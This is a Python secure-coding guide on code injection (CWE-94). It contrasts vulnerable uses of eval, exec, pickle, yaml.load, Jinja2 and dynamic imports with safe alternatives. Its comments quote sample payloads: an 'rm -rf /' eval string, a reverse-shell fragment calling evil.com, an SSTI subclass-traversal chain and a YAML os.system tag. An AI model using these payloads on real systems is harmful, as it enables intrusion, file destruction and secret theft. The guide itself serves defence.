CWE-94: Improper Control of Generation of Code (Code Injection) - Python

Overview

Code injection in Python occurs when untrusted input is passed to code execution functions like eval(), exec(), compile(), or __import__(). This allows attackers to execute arbitrary Python code with full access to the application's runtime environment, including file system, network, environment variables, imported modules, and all application data. Python's dynamic nature and powerful introspection capabilities make code injection particularly dangerous.

Primary Defence: Never use eval() or exec() with user input. Use safe alternatives like json.loads() for JSON data, ast.literal_eval() only for small Python literals, or a purpose-built parser/interpreter with an allowlist of supported operations. If arbitrary user code is unavoidable, run it outside the application process with OS/container isolation, no ambient secrets, no filesystem or network access unless explicitly required, strict resource limits, and short timeouts. Do not rely on restricted __builtins__ as a security boundary.
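The sketch below covers only the process-boundary and resource-limit part of that advice. It runs code in a separate interpreter with a CPU-time cap, a wall-clock timeout, and an empty environment. It assumes a POSIX system (the resource module and preexec_fn), and the limit values and the run_untrusted name are placeholders. It is not isolation on its own: the child keeps this user's filesystem and network access, so it belongs inside a container or VM that has neither.

```python
import resource
import subprocess
import sys

CPU_SECONDS = 2         # assumption: tune for your workload
WALL_CLOCK_SECONDS = 5  # assumption: also covers code that sleeps or blocks

def _limit_child():
    # Runs in the child between fork and exec (POSIX only): cap CPU time
    resource.setrlimit(resource.RLIMIT_CPU, (CPU_SECONDS, CPU_SECONDS))

def run_untrusted(code):
    """Run code in a fresh interpreter with a CPU cap, a timeout, and no env vars.

    NOT a sandbox by itself: the child keeps this user's file and network
    access. Run it inside a container or VM with neither, and no secrets.
    """
    return subprocess.run(
        [sys.executable, "-I", "-c", code],  # -I: isolated mode, ignores PYTHON* vars and user site-packages
        env={},                    # do not inherit API keys, DB URLs, etc.
        preexec_fn=_limit_child,
        capture_output=True,
        text=True,
        timeout=WALL_CLOCK_SECONDS,  # subprocess.run kills the child, then raises TimeoutExpired
    )
```

For example, run_untrusted("print(6 * 7)").stdout is "42\n", while an infinite loop is stopped by the CPU limit or the timeout instead of tying up the application process.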

Common Vulnerable Patterns

eval() with User Input

# VULNERABLE - Direct eval of user input
def calculate(expression):
    result = eval(expression)  # NEVER DO THIS
    return result

# User input: "__import__('os').system('rm -rf /')"
# Executes arbitrary code!

Why this is vulnerable: eval() evaluates any Python expression, so an attacker can import modules, call functions, and read or modify globals.

exec() with User Code

# VULNERABLE - Execute user-provided code
def run_user_script(code):
    exec(code)  # EXTREMELY DANGEROUS
    return "Script executed"

# User input: "import socket; s=socket.socket(); s.connect(('evil.com',1234)); ..."
# Reverse shell established!

Why this is vulnerable: exec() can execute multiple statements, imports, class definitions - full Python capabilities.

compile() and eval() Chain

# VULNERABLE - Compile and execute user code
def execute_formula(formula):
    compiled = compile(formula, '<string>', 'eval')
    result = eval(compiled)
    return result

# User input: "open('/etc/passwd').read()"
# Reads sensitive file

Why this is vulnerable: compiling the string first changes nothing; compile() followed by eval() has the same attack surface as calling eval() directly.

Dynamic Module Import

import importlib

# VULNERABLE - Import user-specified module
def load_plugin(plugin_name):
    module = __import__(plugin_name)  # DANGEROUS
    return module

# Alternate dangerous approach
def load_module(module_name):
    module = importlib.import_module(module_name)  # DANGEROUS
    return module

# User input: "subprocess" or "os"
# Attacker can import any module and access dangerous functions

Why this is vulnerable: Allows importing arbitrary modules. Attacker can import os, subprocess, socket, etc.

Template Injection (Jinja2 Unsafe)

from jinja2 import Template

# VULNERABLE - User input in template without sandboxing
def render_greeting(name):
    template_str = f"Hello {{{{ {name} }}}}"
    template = Template(template_str)
    return template.render()

# User input (the subclass index, here 104, differs between Python versions and environments):
# "''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__['sys'].modules['os'].system('whoami')"
# Executes system command via template injection!

Why this is vulnerable: Jinja2 templates can access Python objects. Attacker can traverse object hierarchy to reach dangerous functions.

Pickle Deserialization

import pickle

# VULNERABLE - Unpickle untrusted data
def load_user_data(data):
    obj = pickle.loads(data)  # CRITICAL VULNERABILITY
    return obj

# Attacker sends crafted pickle payload
# Arbitrary code executes during unpickling

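Why this is vulnerable: the pickle format stores "call this callable with these arguments" instructions (normally produced by an object's __reduce__ method), and pickle.loads() executes them. A crafted payload can therefore name os.system or any other importable function, and it runs during deserialization.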
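A harmless illustration of that mechanism: the hypothetical Payload class below uses __reduce__ to tell pickle to call operator.add(40, 2) at load time. An attacker would substitute os.system or similar; the point is that the victim only calls pickle.loads() and never constructs a Payload.

```python
import operator
import pickle

class Payload:
    """Attacker-controlled class: __reduce__ decides what pickle calls on load."""

    def __reduce__(self):
        # "To rebuild me, call operator.add(40, 2)". A real payload would
        # return something like (os.system, ("...",)) instead.
        return (operator.add, (40, 2))

blob = pickle.dumps(Payload())

# The named callable runs inside pickle.loads(), and its return value
# replaces the object: no Payload instance is ever created here.
result = pickle.loads(blob)
print(result)                 # 42
print(type(result).__name__)  # int
```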

YAML Unsafe Loading

import yaml

# VULNERABLE - Load YAML with arbitrary Python object execution
def load_config(yaml_str):
    config = yaml.load(yaml_str, Loader=yaml.Loader)  # DANGEROUS
    return config

# User YAML input:
# !!python/object/apply:os.system ['whoami']
# Executes system command!

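Why this is vulnerable: yaml.Loader (like yaml.UnsafeLoader) honors tags such as !!python/object/apply:, so a YAML document can construct arbitrary Python objects and call functions like os.system(). Since PyYAML 6.0 the Loader argument to yaml.load() is mandatory, so the danger lies in which loader you pass rather than in omitting one.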

Format String with User Globals Access

# VULNERABLE - Format string with untrusted format spec
def format_message(template, **kwargs):
    return template.format(**kwargs)

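# User input template: "{user.__init__.__globals__[SECRET_KEY]}"
# Leaks any global defined in the module of the argument's class

Why this is vulnerable: format fields can chain attribute and index lookups on any argument, so a user-controlled template can walk from an object to its method's __globals__ and read module-level secrets or configuration. str.format() cannot call functions, so this is primarily information disclosure rather than direct code execution, but a leaked secret (for example a session-signing key) can enable further attacks.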
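A harmless illustration, assuming a hypothetical SECRET_KEY global in the same module as a hypothetical User class. It also shows string.Template as a safer option when users supply templates: Template only substitutes $name placeholders and has no attribute or index syntax.

```python
import string

SECRET_KEY = "s3cr3t"  # hypothetical secret in this module's globals

class User:
    def __init__(self, name):
        self.name = name

user = User("alice")

# Attacker-supplied template: attribute and index lookups only, no calls
attacker_template = "{user.__init__.__globals__[SECRET_KEY]}"
leaked = attacker_template.format(user=user)
print(leaked)  # s3cr3t

# string.Template has no attribute/index syntax; safe_substitute() leaves
# anything it cannot resolve as literal text instead of raising
safe_template = string.Template("Hello $name")
print(safe_template.safe_substitute(name=user.name))                    # Hello alice
print(string.Template("${user.__init__}").safe_substitute(user=user))  # ${user.__init__}
```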

Secure Patterns

SECURE: ast.literal_eval() for Safe Evaluation

import ast

# SECURE - Only allows Python literals (strings, bytes, numbers, tuples, lists, dicts, sets, booleans, None)
def parse_literal(expression):
    try:
        # Only evaluates literals - no function calls, no names, no imports
        return ast.literal_eval(expression)
    except (ValueError, TypeError, SyntaxError, MemoryError, RecursionError) as exc:
        # literal_eval can raise any of these on malformed or hostile input
        raise ValueError("Invalid literal") from exc

# Safe inputs: "42", "3.14", "{'key': 'value'}", "[1, 2, 3]"
# Blocked: "__import__('os').system('whoami')" - raises ValueError

Why this works: ast.literal_eval() only parses Python literal structures (strings, numbers, tuples, lists, dicts, sets, booleans, and None). It cannot evaluate function calls, variable lookups, imports, or executable statements. That makes it a safer replacement for eval() when the expected input is a small literal value. It is not a general-purpose parser for untrusted arbitrary-size input: deeply nested or very large literals can still exhaust memory or the Python stack. Apply length, size, and nesting limits, and prefer json.loads() when JSON is an acceptable format.
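A minimal sketch of those limits, assuming the caller expects a flat list of integers (parse_int_list and MAX_INPUT_CHARS are hypothetical names). It rejects oversized input before parsing and then checks the result's shape, because literal_eval guarantees "a literal", not "the literal you expected".

```python
import ast

MAX_INPUT_CHARS = 1_000  # assumption: size this to your largest legitimate input

def parse_int_list(text):
    """Parse input like "[1, 2, 3]" and insist the result is a flat list of ints."""
    if len(text) > MAX_INPUT_CHARS:
        raise ValueError("Input too long")  # reject before any parsing work
    try:
        value = ast.literal_eval(text)
    except (ValueError, TypeError, SyntaxError, MemoryError, RecursionError) as exc:
        raise ValueError("Not a valid literal") from exc
    # bool is a subclass of int, so exclude it explicitly
    if not isinstance(value, list) or not all(
        isinstance(item, int) and not isinstance(item, bool) for item in value
    ):
        raise ValueError("Expected a list of integers")
    return value
```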

SECURE: Restricted Expression Parser

import ast
import operator

# SECURE - Allowlist allowed operators
ALLOWED_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
    ast.Mod: operator.mod,
    ast.Pow: operator.pow,  # unbounded: "9**9**9" can exhaust CPU and memory
    ast.USub: operator.neg,
}

# ast.walk() also yields the operator nodes (ast.Add, ast.USub, ...), so they
# must be allowlisted alongside the structural node types
ALLOWED_NODES = (ast.Expression, ast.Constant, ast.BinOp, ast.UnaryOp) + tuple(ALLOWED_OPS)

def safe_eval(expr):
    """Safely evaluate mathematical expressions only"""
    tree = ast.parse(expr, mode='eval')

    # Verify only allowed node types
    for node in ast.walk(tree):
        if not isinstance(node, ALLOWED_NODES):
            raise ValueError(f"Forbidden node type: {type(node).__name__}")
        if isinstance(node, ast.BinOp) and type(node.op) not in ALLOWED_OPS:
            raise ValueError(f"Forbidden operator: {type(node.op).__name__}")
        # Numbers only: rejects strings, so "'a' * 10**9" cannot build a huge string
        if isinstance(node, ast.Constant) and (
            isinstance(node.value, bool) or not isinstance(node.value, (int, float))
        ):
            raise ValueError("Only numeric constants are allowed")

    # Evaluate the validated tree with a small interpreter (eval() is never called)
    def eval_node(node):
        if isinstance(node, ast.Constant):
            return node.value
        elif isinstance(node, ast.BinOp):
            left = eval_node(node.left)
            right = eval_node(node.right)
            return ALLOWED_OPS[type(node.op)](left, right)
        elif isinstance(node, ast.UnaryOp):
            operand = eval_node(node.operand)
            return ALLOWED_OPS[type(node.op)](operand)
        else:
            raise ValueError(f"Unsupported node: {type(node).__name__}")

    return eval_node(tree.body)

# Usage
result = safe_eval("(10 + 5) * 2")  # 30
# safe_eval("__import__('os').system('whoami')")  # Raises ValueError

Why this works: This AST-based evaluator parses user input into an Abstract Syntax Tree and checks it against an allowlist of node types and operators before computing anything. ast.parse() builds the tree without executing it. Walking the tree and rejecting any node outside ALLOWED_NODES, and any operator outside ALLOWED_OPS (basic arithmetic only), rules out function calls, imports, name lookups, and attribute access. The custom eval_node() interpreter then computes the result from the approved nodes alone. Because user text never reaches eval(), there is no path to __import__() or __builtins__. Use this pattern for calculators, formula evaluators, or any feature where users provide mathematical expressions. The allowlist is explicit and auditable; add only operations you've reviewed. Arithmetic can still exhaust resources, though: an input as short as 9**9**9 asks for an integer with hundreds of millions of digits, so cap input length and bound exponent size.
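Even with an operator allowlist, ast.Pow lets a very short input demand an enormous integer. One way to bound it, sketched here as an assumption rather than a standard API, is a wrapper that estimates the result's size before computing it (bounded_pow and MAX_RESULT_BITS are hypothetical names).

```python
import operator

MAX_RESULT_BITS = 10_000  # assumption: roughly 3,000 decimal digits; tune for your app

def bounded_pow(base, exponent):
    """Drop-in replacement for operator.pow that refuses huge integer results."""
    if isinstance(base, int) and isinstance(exponent, int) and exponent > 0:
        # |base| < 2**bit_length, so bit_length * exponent upper-bounds the
        # result's size (conservative: 1**big is rejected too)
        if abs(base).bit_length() * exponent > MAX_RESULT_BITS:
            raise ValueError("Exponent too large")
    # Float arithmetic is fast and raises OverflowError instead of growing
    return operator.pow(base, exponent)
```

To use it with the evaluator above, register it in place of operator.pow: ALLOWED_OPS[ast.Pow] = bounded_pow.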

SECURE: Configuration-Driven Logic (Not Code)

import json

# SECURE - Use JSON configuration instead of code
def apply_pricing_rule(price, rule_config):
    """Apply pricing rules from JSON config, not executable code"""
    rule = json.loads(rule_config)

    # Declarative configuration
    if rule['type'] == 'percentage_discount':
        discount = price * (rule['percent'] / 100)
        return price - discount
    elif rule['type'] == 'fixed_discount':
        return price - rule['amount']
    elif rule['type'] == 'bulk_discount':
        if price > rule['threshold']:
            return price * (1 - rule['discount'])
        return price
    else:
        raise ValueError("Unknown rule type")

# Safe configuration (JSON, not code)
config = '{"type": "percentage_discount", "percent": 10}'
discounted = apply_pricing_rule(100, config)  # 90.0

# No code injection possible - only data configuration

Why this works: Using JSON for configuration instead of executable code eliminates code injection entirely. JSON is a data-only format - it can only represent basic types (objects, arrays, strings, numbers, booleans, null); it cannot contain functions, class instantiations, imports, or executable statements. When you parse JSON with json.loads(), you get pure Python data structures (dicts, lists, strings, numbers), not code. The business logic (if/elif conditions, calculations) lives in your trusted Python code, while user input only supplies data values (discount percentages, thresholds, amounts). This is the safest pattern for extensibility: users configure behavior through data, not by injecting code. Even if an attacker fully controls rule_config, they can only set field values, not execute commands or access the system. Use JSON config for pricing rules, workflows, plugins, feature flags - anywhere users customize behavior. Combine with schema validation (jsonschema) to enforce data structure and prevent logic errors.
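The text suggests jsonschema for validation; as a dependency-free alternative, here is a minimal stdlib sketch that checks the parsed rule before any business logic sees it. RULE_FIELDS and parse_rule are hypothetical names, and the field lists simply mirror the three rule types in apply_pricing_rule().

```python
import json
import math

# Hypothetical schema: required numeric fields for each rule type
RULE_FIELDS = {
    "percentage_discount": ("percent",),
    "fixed_discount": ("amount",),
    "bulk_discount": ("threshold", "discount"),
}

def parse_rule(rule_config):
    """Parse a pricing rule and reject anything outside the expected shape."""
    rule = json.loads(rule_config)  # JSONDecodeError is a ValueError subclass
    if not isinstance(rule, dict):
        raise ValueError("Rule must be a JSON object")
    rule_type = rule.get("type")
    if not isinstance(rule_type, str) or rule_type not in RULE_FIELDS:
        raise ValueError("Unknown rule type")
    required = RULE_FIELDS[rule_type]
    unexpected = set(rule) - set(required) - {"type"}
    if unexpected:
        raise ValueError(f"Unexpected fields: {sorted(unexpected)}")
    for name in required:
        value = rule.get(name)
        # bool is a subclass of int, so reject it explicitly
        if isinstance(value, bool) or not isinstance(value, (int, float)):
            raise ValueError(f"Field {name!r} must be a number")
        # json.loads accepts NaN and Infinity by default
        if isinstance(value, float) and not math.isfinite(value):
            raise ValueError(f"Field {name!r} must be finite")
    return rule
```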

SECURE: Jinja2 with Sandboxing

from jinja2.sandbox import SandboxedEnvironment

# SECURE - Use Jinja2 sandbox and enable auto-escaping for HTML output
env = SandboxedEnvironment(autoescape=True)

def render_template(template_str, context):
    """Render templates in sandboxed environment"""
    template = env.from_string(template_str)
    return template.render(context)

# Usage
result = render_template("Hello {{ name }}!", {'name': 'Alice'})  # "Hello Alice!"

# Sandboxed - dangerous operations blocked
# template_str = "{{ ''.__class__.__mro__[1].__subclasses__() }}"
# Raises SecurityError

Why this works: Jinja2's SandboxedEnvironment restricts template access to dangerous Python features, reducing code injection risk from template strings. Unlike regular Jinja2 (which allows attribute access like {{''.__class__.__mro__}}), the sandbox blocks access to private attributes (those starting with _), sensitive methods (__subclasses__, __globals__), and dangerous builtins. Attackers often exploit template engines to escape into the Python runtime via attribute traversal; the sandbox prevents many of these escapes by intercepting attribute lookups and rejecting unsafe ones. Treat user-editable templates as executable template logic: use the sandbox, register only safe custom filters/functions, avoid helpers that reach files/network/process state, enable auto-escaping for HTML output, and apply size/time limits where possible. For stricter control, consider a logic-less engine (Mustache, Handlebars) or a small application-specific template language.

SECURE: Safe YAML Loading

import yaml

# SECURE - Use SafeLoader to prevent arbitrary object instantiation
def load_config(yaml_str):
    config = yaml.safe_load(yaml_str)  # ALWAYS use safe_load
    return config

# Alternative explicit safe loader
def load_config_explicit(yaml_str):
    config = yaml.load(yaml_str, Loader=yaml.SafeLoader)
    return config

# Safe - only loads basic YAML types (strings, numbers, lists, dicts)
# Blocks: !!python/object/apply:os.system ['whoami']

Why this works: yaml.safe_load() only constructs plain Python data (dict, list, str, int, float, bool, None, plus standard YAML types such as dates and timestamps) and refuses to instantiate arbitrary objects, which closes the code-execution path through YAML deserialization. Unsafe loaders such as yaml.Loader or yaml.UnsafeLoader honor tags like !!python/object/apply:, which let a document call os.system(), open files, or execute arbitrary code. safe_load() uses SafeLoader, which only recognizes standard YAML tags and raises yaml.constructor.ConstructorError when it meets a python/* tag. Always use safe_load() or explicitly pass Loader=yaml.SafeLoader when parsing untrusted YAML; loading untrusted YAML with an unsafe loader is as dangerous as calling eval() on it. For configuration files you control, safe_load() is sufficient. If you need custom object loading, register explicit constructors with add_constructor() on a SafeLoader subclass and validate their fields; never fall back to yaml.load() with an unsafe loader.

SECURE: JSON for Serialization (Not Pickle)

import json

# SECURE - Use JSON instead of pickle
def save_user_data(data):
    serialized = json.dumps(data)
    return serialized

def load_user_data(serialized):
    data = json.loads(serialized)
    return data

# JSON only supports basic types - no code execution
# If complex objects needed, use explicit serialization methods

Why this works: JSON is a data-only format that cannot execute code during deserialization, while pickle can instantiate arbitrary Python objects and execute code via __reduce__ methods, making it dangerous for untrusted data. When you json.loads() a payload, you get only basic types (dicts, lists, strings, numbers); an attacker cannot trigger class constructors, import modules, or run commands. Pickle, by contrast, is designed to serialize entire Python object graphs, including class instances, and can call arbitrary code during unpickling. Attackers craft malicious pickle payloads that execute os.system(), open reverse shells, or exfiltrate data. Never unpickle untrusted data - use JSON for serialization. If you need complex objects, serialize them to JSON with explicit to_dict() methods and reconstruct them with constructors that validate fields. For internal, trusted use (caching, IPC between your own processes), pickle is acceptable with integrity checks (HMAC).
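A minimal sketch of the to_dict()/validating-constructor approach, assuming a hypothetical Order dataclass. Only plain data crosses the serialization boundary, and from_dict() checks every field before building the object.

```python
import json
from dataclasses import asdict, dataclass

@dataclass
class Order:  # hypothetical domain object
    order_id: int
    items: list
    total: float

    def to_dict(self):
        return asdict(self)

    @classmethod
    def from_dict(cls, data):
        # JSON yields only plain data; validate each field explicitly
        if not isinstance(data, dict) or set(data) != {"order_id", "items", "total"}:
            raise ValueError("Unexpected order shape")
        if isinstance(data["order_id"], bool) or not isinstance(data["order_id"], int):
            raise ValueError("order_id must be an integer")
        if not isinstance(data["items"], list) or not all(isinstance(i, str) for i in data["items"]):
            raise ValueError("items must be a list of strings")
        if isinstance(data["total"], bool) or not isinstance(data["total"], (int, float)):
            raise ValueError("total must be a number")
        return cls(data["order_id"], list(data["items"]), float(data["total"]))

def save_order(order):
    return json.dumps(order.to_dict())

def load_order(serialized):
    return Order.from_dict(json.loads(serialized))
```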

SECURE: Plugin System with Allowlist

import importlib

# SECURE - Allowlist allowed plugins
ALLOWED_PLUGINS = {
    'plugin_auth': 'myapp.plugins.auth',
    'plugin_reports': 'myapp.plugins.reports',
    'plugin_export': 'myapp.plugins.export'
}

def load_plugin(plugin_name):
    """Load plugin from allowlist only"""
    if plugin_name not in ALLOWED_PLUGINS:
        raise ValueError(f"Plugin '{plugin_name}' not allowed")

    module_path = ALLOWED_PLUGINS[plugin_name]
    module = importlib.import_module(module_path)
    return module

# Safe - only pre-approved plugins can be loaded
# load_plugin('os')  # Raises ValueError

Why this works: Allowlisting modules for dynamic imports prevents code injection by ensuring only pre-approved modules can be loaded. When users control which modules to import (plugin systems, configurable imports), an attacker could import dangerous modules (os, subprocess, importlib) or malicious third-party packages to execute arbitrary code, read files, or compromise the system. By checking plugin_name against ALLOWED_PLUGINS before calling importlib.import_module(), you ensure only trusted, reviewed plugins are accessible. Because the allowlist maps user-facing plugin names to module paths you control, user input is only ever used as a dictionary key and never becomes part of an import path. Store the allowlist server-side (never trust client input for module names), keep it minimal and audited, and review each plugin's code. For stronger isolation, load plugins in separate processes (multiprocessing) or containers. Combine with code signing or hash verification to detect tampering.

Avoid SymPy parse_expr() / sympify() for Untrusted Strings

from sympy.parsing.sympy_parser import parse_expr, standard_transformations

# DANGEROUS for untrusted input (user_input is attacker-controlled text):
expr = parse_expr(user_input, transformations=standard_transformations)

Why this matters: SymPy's string parsers are powerful symbolic-math tools, but parse_expr() and sympify() use Python evaluation internally and SymPy documents that they should not be used on unsanitized input. For user-entered formulas, prefer the restricted AST evaluator above, a parser you can configure to a small grammar, or an isolated worker process with resource limits if symbolic math is truly required.

Key Security Functions

AST-based Expression Validator

import ast

def validate_safe_expression(expr_str):
    """Validate expression only contains safe operations"""
    try:
        tree = ast.parse(expr_str, mode='eval')
    except SyntaxError as exc:
        raise ValueError("Invalid Python syntax") from exc

    # Define allowed node types. ast.Constant covers every literal on Python 3.8+;
    # the old ast.Num/ast.Str aliases are deprecated and removed in recent releases.
    SAFE_NODES = (
        ast.Expression, ast.Constant,
        ast.BinOp, ast.UnaryOp, ast.Compare,
        ast.List, ast.Tuple, ast.Dict,
        ast.Load,  # context node that ast.walk() yields for List and Tuple
        ast.Add, ast.Sub, ast.Mult, ast.Div, ast.Mod, ast.Pow,
        ast.Eq, ast.NotEq, ast.Lt, ast.LtE, ast.Gt, ast.GtE,
        ast.USub, ast.UAdd
    )

    for node in ast.walk(tree):
        if not isinstance(node, SAFE_NODES):
            raise ValueError(f"Forbidden operation: {type(node).__name__}")

    # Passing validation is not permission to call eval(): evaluate the tree
    # with an interpreter such as safe_eval(), and bound input size and exponents.
    return True

# Usage
validate_safe_expression("(10 + 5) * 2")  # OK
# validate_safe_expression("__import__('os')")  # Raises ValueError

Avoid Restricted eval() as a Security Boundary

# DANGEROUS - restricted builtins are not a sandbox
safe_globals = {'__builtins__': {'abs': abs, 'max': max}}
result = eval(user_expression, safe_globals, {})

Why this matters: Removing selected builtins does not make Python evaluation safe. Python objects expose introspection paths, and restricted globals have a long history of bypasses. Replace eval() with an allowlisted parser. If you must run user code, run it out of process in a locked-down container or service account with resource limits and no application secrets.
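A harmless demonstration of one such introspection path: with builtins removed entirely, names like open no longer resolve, yet attribute access on a plain literal still reaches object and, from there, every class that directly subclasses it. Published bypasses start from lists like this one.

```python
# Restricted globals: no builtins at all
restricted_globals = {"__builtins__": {}}

# Attribute access needs no builtins: from an empty tuple we reach `object`
# and list every class that directly subclasses it
classes = eval("().__class__.__base__.__subclasses__()", restricted_globals, {})

print(int in classes, type in classes)  # True True
print(len(classes))  # varies by interpreter version and loaded modules
```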

Plugin Signature Verification

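import hashlib
import hmac
import os

# Read the key from the environment (KeyError if unset, so it fails closed);
# never hard-code it. HMAC is symmetric: anyone holding this key can sign
# plugins, so prefer public-key signatures for third-party code.
PLUGIN_SECRET = os.environ["PLUGIN_SECRET"].encode()

def verify_plugin_signature(plugin_code, signature):
    """Verify plugin hasn't been tampered with"""
    expected_sig = hmac.new(PLUGIN_SECRET, plugin_code.encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected_sig, signature)

def load_verified_plugin(plugin_code, signature):
    """Only load plugins with valid signature"""
    if not verify_plugin_signature(plugin_code, signature):
        raise ValueError("Invalid plugin signature")

    # A valid signature proves who produced the code, not that it is safe.
    # Verified code runs with full application privileges: an empty
    # __builtins__ is not a sandbox (and breaks imports and class
    # definitions), so use process or container isolation if you need one.
    namespace = {"__name__": "verified_plugin"}
    exec(compile(plugin_code, "<verified-plugin>", "exec"), namespace)
    return namespace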

Analysis Steps

  1. Locate the eval/exec Call:
# Line 42 in app/calculator.py
result = eval(user_expression)  # VULNERABLE
  2. Trace Input Source:
  • Web form? request.form['expression']
  • API endpoint? request.json['code']
  • File upload? Reading file contents
  • Database? User-stored formulas
  3. Assess Execution Context:
  • What can injected code access? (All Python modules, file system, network)
  • What privileges does application run with? (Web server user, database access)
  • What data is accessible? (User data, secrets in environment variables)
  4. Determine Safe Alternative:
  • Mathematical expressions → Use a restricted AST evaluator or a purpose-built expression parser; do not use SymPy string parsers on unsanitized input
  • Configuration → Use json.loads() or yaml.safe_load()
  • Business rules → Use a rule engine or declarative config
  • Plugin system → Use allowlist + signature verification
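For step 1, a rough triage helper can list candidate call sites in a file before you trace their inputs. This is a minimal AST-based sketch with hypothetical names and starter lists, not a replacement for Bandit or Semgrep: it only matches direct calls such as eval(...) or pickle.loads(...) and misses aliases like `from pickle import loads`.

```python
import ast

# Hypothetical starter lists; extend them for your codebase
DANGEROUS_NAMES = {"eval", "exec", "compile", "__import__"}
DANGEROUS_ATTRS = {
    "importlib.import_module",
    "pickle.loads",
    "pickle.load",
    "yaml.load",
}

def find_dangerous_calls(source, filename="<source>"):
    """Return sorted (line, call) pairs for calls worth tracing back to input."""
    findings = []
    for node in ast.walk(ast.parse(source, filename=filename)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        if isinstance(func, ast.Name) and func.id in DANGEROUS_NAMES:
            findings.append((node.lineno, func.id))
        elif (
            isinstance(func, ast.Attribute)
            and isinstance(func.value, ast.Name)
            and f"{func.value.id}.{func.attr}" in DANGEROUS_ATTRS
        ):
            findings.append((node.lineno, f"{func.value.id}.{func.attr}"))
    return sorted(findings)
```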

Remediation for Scanner Finding

Step 1: Identify the purpose

# BEFORE (Line 42 - vulnerable)
def calculate(user_expression):
    result = eval(user_expression)  # User wants to calculate "2 + 2"
    return result

Step 2: Replace with safe alternative

def calculate(user_expression):
    # For arithmetic, use the restricted AST evaluator shown above,
    # or a reviewed expression parser configured to an allowlisted grammar.
    return safe_eval(user_expression)

Step 3: Add input validation

import re

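def validate_math_expression(expr):
    """Additional validation layer (defense in depth, not a replacement for safe_eval)"""
    # Max length
    if len(expr) > 200:
        raise ValueError("Expression too long")

    # Only allow digits, + - * /, parentheses, dots, and whitespace;
    # fullmatch() requires the whole string to match.
    # Note: '**' passes this check, so exponents must still be bounded.
    if not re.fullmatch(r'[0-9+\-*/().\s]+', expr):
        raise ValueError("Invalid characters in expression")

    # Keyword denylist: unreachable while the character allowlist above holds
    # (no letters or underscores get through); kept only as a backstop in case
    # the allowlist is loosened later. Never rely on a denylist alone.
    forbidden = ['import', 'exec', 'eval', 'compile', 'open', '__']
    for word in forbidden:
        if word in expr.lower():
            raise ValueError("Forbidden keyword in expression")

    return True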

def safe_calculate(user_expression):
    validate_math_expression(user_expression)
    return safe_eval(user_expression)

Common Scanner False Positives

False Positive: eval() with Hardcoded String

# May be flagged but is safe if input is truly hardcoded
config = eval("{'setting': True}")  # Hardcoded, not from user

# Better: Use ast.literal_eval anyway for defense-in-depth
config = ast.literal_eval("{'setting': True}")

Verification

After remediation:

  • No eval(), exec(), compile() with user input
  • No __import__() or importlib.import_module() with user strings
  • Templates use SandboxedEnvironment (Jinja2)
  • YAML uses yaml.safe_load() (not yaml.load())
  • Deserialization uses JSON (not pickle)
  • Scanner re-scan shows finding resolved
  • Tested with code injection payloads (blocked)
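For the last item, a small regression check can keep known payloads in your test suite. This is a minimal sketch with a hypothetical payload list and helper name; point it at your hardened evaluator, never at eval() itself, because a payload that is not rejected is actually executed. ast.literal_eval serves here as a stand-in evaluator.

```python
import ast

INJECTION_PAYLOADS = [
    "__import__('os').system('id')",
    "open('/etc/passwd').read()",
    "().__class__.__base__.__subclasses__()",
    "[c for c in ().__class__.__base__.__subclasses__()]",
]

def payloads_not_rejected(evaluate, payloads=INJECTION_PAYLOADS):
    """Return the payloads that `evaluate` did NOT reject with ValueError/SyntaxError.

    Any other exception propagates, so it surfaces as a test error.
    """
    survivors = []
    for payload in payloads:
        try:
            evaluate(payload)
        except (ValueError, SyntaxError):
            continue  # rejected, as expected
        survivors.append(payload)
    return survivors

print(payloads_not_rejected(ast.literal_eval))  # []
```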

Security Checklist

  • Never use eval(), exec(), or compile() with user input
  • Never use __import__() or importlib.import_module() with user strings
  • Use ast.literal_eval() for literal evaluation only
  • Use json.loads() or yaml.safe_load() for configuration
  • Use SandboxedEnvironment for Jinja2 templates
  • Never deserialize untrusted data with pickle
  • Implement plugin allowlisting for dynamic imports
  • Validate input length and character set
  • Use AST parsing to verify safe expressions
  • Avoid SymPy parse_expr()/sympify() on unsanitized input; use an allowlisted parser or isolate symbolic math execution
  • Log and monitor code execution attempts
  • Run automated security scans (Bandit, Semgrep)

Additional Resources